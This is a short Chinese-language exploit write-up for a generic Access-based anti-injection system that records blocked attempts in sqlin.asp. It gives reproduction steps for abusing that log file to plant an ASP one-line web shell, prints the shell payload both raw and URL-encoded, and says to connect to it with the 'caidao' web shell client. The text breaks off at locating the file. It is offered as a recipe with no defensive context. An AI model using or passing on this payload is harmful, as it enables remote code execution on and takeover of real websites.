漏洞简介 access通用防注入系统会把所有记录存到sqlin.asp中 漏洞复现 常规注入测试,发现被拦截,但是记录会被写进网站日志文件中 那么就可以利用一句话木马了,这里使用asp类型一句话木马 <%execute(request("pass"))%> 发现进行了编码,那么把一句话木马也编码一下 修改后 %3C%25execute(request(%22pass%22))%25%3E 去到菜刀连接,找到文件